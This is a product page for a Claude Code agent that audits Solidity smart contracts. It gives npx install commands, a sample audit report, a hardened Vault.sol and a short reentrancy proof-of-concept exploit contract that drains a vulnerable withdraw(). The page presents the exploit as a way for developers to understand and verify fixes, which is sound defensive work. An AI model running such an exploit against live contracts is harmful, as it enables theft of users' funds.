Skills · 29 March 2026 · 1 min read

Claude Code Agent: Smart Contract Auditor — Web3 Security

Claude Code agent for auditing Solidity smart contracts. Reentrancy, overflow, access control, gas optimization, and best practices.

Agent ready

Review before installing

This asset requires review first. The copied instruction asks the agent to dry-run, list what it will write, and continue only after confirmation.

Needs Confirmation · 62/100 · Policy: confirmation required
Agent entry point: any MCP/CLI agent
Type: Agent
Install: Single
Trust: trust level Established
Entry: Claude Code Agent: Smart Contract Auditor
Review-first command:

```shell
npx -y tokrepo@latest install bdf1e117-e30b-40eb-8ebf-fb63d7eaee34 --target codex
```

Dry-run first and confirm what will be written before running this command.

TL;DR
A Claude Code agent that audits Solidity smart contracts for reentrancy, overflow, access control, and gas optimization.
§01

What it is

Smart Contract Auditor is a specialized Claude Code agent for blockchain and Web3 security tasks. It conducts security assessments of Solidity smart contracts, detecting vulnerabilities like reentrancy attacks, integer overflow, access control issues, flash loan exploits, and MEV attack vectors. The agent uses a systematic approach combining automated scanning with manual inspection for business logic flaws.

This agent targets Solidity developers and security researchers who need automated vulnerability detection before deploying contracts to mainnet. It integrates with static analysis tools like Slither, Mythril, and Semgrep.

§02

How it saves time or tokens

Manual smart contract auditing requires deep expertise and hours of line-by-line review. This agent automates the first pass, identifying common vulnerability patterns and flagging suspicious code sections. The token estimate is approximately 500 tokens for the agent configuration.

The agent generates structured audit reports with severity classifications, so development teams can prioritize fixes by impact rather than reviewing findings in random order.

§03

How to use

  1. Install the agent from Claude Code Templates:

```shell
npx claude-code-templates@latest --agent blockchain-web3/smart-contract-auditor --yes
```

  2. The agent activates automatically when Claude Code detects Solidity files or blockchain-related tasks.
  3. Ask the agent to audit a contract:

```text
Audit the Vault.sol contract for security vulnerabilities.
Focus on reentrancy, access control, and economic attack vectors.
```
§04

Example

The agent produces structured findings like this:

```text
Audit Report: Vault.sol

Critical
  • Reentrancy in withdraw(): External call before state update on line 45.
    Move the balance update before the transfer.

High
  • Missing access control on setFee(): Any address can change the protocol fee.
    Add onlyOwner modifier.

Medium
  • Unchecked return value: transferFrom on line 78 does not check the boolean return.
    Use SafeERC20.safeTransferFrom.

Gas Optimization
  • Storage reads in loop: balances[msg.sender] read 3 times in processRewards().
    Cache in a local variable.
```
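A hardened Vault.sol that closes each finding in the report above, added here as an illustration rather than as output of the agent; the OpenZeppelin v5 imports, the storage layout, and the rewardToken, stakers and processRewards details are assumptions:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
// Assumed OpenZeppelin v5 imports; the storage layout below is hypothetical.
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";
import {Ownable} from "@openzeppelin/contracts/access/Ownable.sol";
contract Vault is Ownable {
    using SafeERC20 for IERC20;
    IERC20 public immutable rewardToken;          // hypothetical ERC-20
    uint256 public fee;                           // basis points
    mapping(address => uint256) public balances;  // ETH credited per user
    mapping(address => uint256) public tokenBalances;
    address[] public stakers;                     // hypothetical staker list
    constructor(IERC20 _rewardToken) Ownable(msg.sender) { rewardToken = _rewardToken; }
    function deposit() external payable {
        if (balances[msg.sender] == 0) stakers.push(msg.sender);
        balances[msg.sender] += msg.value;  // ^0.8 checked arithmetic: no SafeMath needed
    }

    // Critical finding: checks-effects-interactions. The balance is zeroed before the
    // external call, so a re-entering receive() fails the require() and reverts.
    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");        // check
        balances[msg.sender] = 0;                           // effect
        (bool ok, ) = msg.sender.call{value: amount}("");   // interaction
        require(ok, "ETH transfer failed");
    }

    // High finding: only the owner may change the fee.
    function setFee(uint256 newFee) external onlyOwner {
        require(newFee <= 1_000, "fee above 10%");
        fee = newFee;
    }

    // Medium finding: SafeERC20 reverts on a false or missing return value.
    function depositToken(uint256 amount) external {
        rewardToken.safeTransferFrom(msg.sender, address(this), amount);
        tokenBalances[msg.sender] += amount;
    }

    // Gas finding: one storage read of balances[s] per iteration instead of three.
    function processRewards(uint256 rateBps) external onlyOwner {
        for (uint256 i = 0; i < stakers.length; i++) {
            address s = stakers[i];
            uint256 bal = balances[s];                       // cached local copy
            if (bal > 0) balances[s] = bal + (bal * rateBps) / 10_000;
        }
    }
}
```

Re-running the agent (or Slither) against this version is the quickest way to verify that the Critical and High findings no longer appear.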


The agent can also generate proof-of-concept exploit code:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Minimal interface of the audited contract, assumed so the PoC compiles;
// the page's PoC references Vault without defining it.
interface Vault {
    function deposit() external payable;
    function withdraw() external;
}

// Reentrancy exploit PoC (as generated by the agent)
contract Exploit {
    Vault public vault;

    constructor(address _vault) {
        vault = Vault(_vault);
    }

    // Deposit, then withdraw: a withdraw() that sends ETH before zeroing
    // the balance hands control to receive() below while state is stale.
    function attack() external payable {
        vault.deposit{value: msg.value}();
        vault.withdraw();
    }

    // Re-enters while the Vault still holds funds. Against a withdraw()
    // that updates the balance before the transfer, this nested call reverts.
    receive() external payable {
        if (address(vault).balance >= 1 ether) {
            vault.withdraw();
        }
    }
}
```

§07

Common pitfalls

  • Automated auditing catches common patterns but misses business logic vulnerabilities. Always pair automated scanning with manual review of economic incentives and edge cases.
  • The agent works with Solidity contracts. Vyper, Cairo, and Move contracts require different tooling and analysis approaches.
  • Static analysis tools (Slither, Mythril) need to be installed separately. The agent integrates with them but does not install them. Run pip install slither-analyzer and pip install mythril before using those features.

FAQ

What vulnerability types does the agent detect?

The agent checks for reentrancy, integer overflow/underflow, access control issues, flash loan attack vectors, MEV vulnerabilities, unchecked return values, and gas optimization opportunities. It follows OWASP guidelines adapted for smart contracts.

Does it work with any Solidity version?

The agent analyzes Solidity contracts across versions. It understands both older patterns (SafeMath for pre-0.8) and newer built-in overflow checks. Specify the compiler version in your pragma for accurate analysis.

Can it generate proof-of-concept exploits?

Yes. For critical and high severity findings, the agent can generate Solidity exploit contracts that demonstrate the vulnerability. These PoCs help developers understand the attack vector and verify their fixes.

Does it integrate with Slither and Mythril?

Yes. The agent can run Slither for static analysis and Mythril for symbolic execution if they are installed in your environment. Results from these tools are incorporated into the audit report.

How do I install the agent?

Run 'npx claude-code-templates@latest --agent blockchain-web3/smart-contract-auditor --yes' to install. The agent activates automatically in Claude Code when it detects Solidity files or blockchain security tasks.

Sources (3)
  • Claude Code Templates: specialized agent configurations for Claude Code
  • Slither GitHub: Slither static analysis framework for Solidity
  • OWASP: OWASP Smart Contract Security guidelines
Source and credits

Created by Claude Code Templates by davila7. Licensed under MIT. Install: npx claude-code-templates@latest --agent blockchain-web3/smart-contract-auditor --yes
